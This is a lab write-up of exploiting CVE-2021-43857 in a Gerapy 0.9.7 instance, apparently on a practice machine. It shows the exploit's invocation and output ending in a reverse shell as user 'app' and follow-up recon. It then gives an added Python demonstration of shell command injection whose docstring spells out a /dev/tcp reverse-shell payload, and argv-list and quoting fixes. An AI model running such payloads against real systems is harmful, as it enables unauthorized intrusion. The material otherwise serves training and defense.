CVE-2021-43857


The target Gerapy instance appears to be vulnerable to CVE-2021-43857 because it runs an outdated version, 0.9.7 (the exploit targets Gerapy < 0.9.8, where the issue was fixed).

Initial Fail


The initial exploit attempt fails. This is likely because no project exists on the target yet: the exploit looks up an existing project and uses its ID to build the request URL, so it has nothing to work with on an empty instance.

Creating a Project


Creating an arbitrary project

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/levram]
└─$ python3 CVE-2021-43857.py -t $IP -p 8000 -L $tun0 -P 8000
  ______     _______     ____   ___ ____  _       _  _  _____  ___ ____ _____ 
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |     | || ||___ / ( _ ) ___|___  |
| |    \ \ / /|  _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \  / / 
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____|__   _|__) | (_) |__) |/ /  
 \____|  \_/  |_____|   |_____|\___/_____|_|        |_||____/ \___/____//_/   
                                                                              
 
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
{'Authorization': 'Token de90d5d38d4b03f5448c5823284ecd8d428dbb9b'}
[*] Getting the project list
[{"name": "CVE-2021-43857"}]
[*] Found project: CVE-2021-43857
[*] Getting the ID of the project to build the URL
[*] Found ID of the project:  3
[*] Setting up a netcat listener
listening on [any] 8000 ...
[*] Executing reverse shell payload
[*] Watchout for shell! :)
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.24] 34150
bash: cannot set terminal process group (844): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$ 
app@ubuntu:~/gerapy$ 
app@ubuntu:~/gerapy$ whoami
whoami
app
app@ubuntu:~/gerapy$ hostname
hostname
ubuntu
app@ubuntu:~/gerapy$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:39:1b brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.206.24/24 brd 192.168.206.255 scope global ens160
       valid_lft forever preferred_lft forever

Running the modified exploit script again, now with a newly created project in place, succeeds. The reverse shell lands as the app account (note that it is a bare, non-interactive bash with no job control, as the warnings on connect show). Initial foothold on the target established as app via CVE-2021-43857.
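CVE-2021-43857 is an authenticated command execution bug in Gerapy before 0.9.8. The page only shows the exploit's output, not the vulnerable code, so the following is an added example (not Gerapy's own code and not the exploit script used above) illustrating the bug class the exploit relies on: a command line assembled from an API parameter and handed to a shell. The shape of the vulnerable function is assumed for illustration, `echo` stands in for the real command-line tool the application runs, and the `spider` strings are constructed inputs; the `SPIDER_MARKER` check is only there to make the difference between the vulnerable and hardened forms observable.

```python
#!/usr/bin/env python3
"""Added illustration of the bug class behind CVE-2021-43857: a shell command
assembled from a request parameter. Not Gerapy's code; the function shapes
are assumptions made for the example."""
import shlex
import subprocess

# Constructed marker: if it shows up as its own output line, a second,
# attacker-supplied command was executed by the shell.
SPIDER_MARKER = "INJECTED"


def build_unsafe_command(spider: str) -> str:
    """Vulnerable pattern (assumed shape): the request parameter is
    string-joined into a single command line. 'echo' stands in for the
    real tool the application invokes."""
    return " ".join(["echo", "parse", "--spider", spider])


def run_unsafe(spider: str) -> str:
    """Runs the joined string with shell=True, so ';', '|', '$(...)' etc.
    inside `spider` are interpreted by /bin/sh. This is the condition an
    exploit turns into a reverse shell by supplying something like
    "x; bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'" as the parameter."""
    out = subprocess.run(build_unsafe_command(spider), shell=True,
                         capture_output=True, text=True, check=False)
    return out.stdout


def run_safe(spider: str) -> str:
    """Hardened form: pass an argv list and never involve a shell. The
    parameter becomes exactly one argument; metacharacters are inert."""
    out = subprocess.run(["echo", "parse", "--spider", spider],
                         capture_output=True, text=True, check=False)
    return out.stdout


def run_quoted(spider: str) -> str:
    """If a shell really is unavoidable, shlex.quote() turns the parameter
    into a single shell word so it cannot terminate the command."""
    cmd = " ".join(["echo", "parse", "--spider", shlex.quote(spider)])
    out = subprocess.run(cmd, shell=True,
                         capture_output=True, text=True, check=False)
    return out.stdout


def injected(output: str) -> bool:
    """True when the injected second command ran, i.e. the marker appears
    as a line of its own rather than as part of the echoed argument."""
    return SPIDER_MARKER in output.splitlines()


if __name__ == "__main__":
    payload = f"quotes; echo {SPIDER_MARKER}"   # constructed attacker input
    print("unsafe :", injected(run_unsafe(payload)))   # injected command ran
    print("safe   :", injected(run_safe(payload)))     # treated as one argument
    print("quoted :", injected(run_quoted(payload)))   # quoted into one word
```

The fix that matters is the argv-list form in `run_safe`: it removes the shell entirely, so there is nothing left to inject into, and it is what a reviewer should ask for over `shlex.quote`, which only papers over a command line that should not have been a string in the first place.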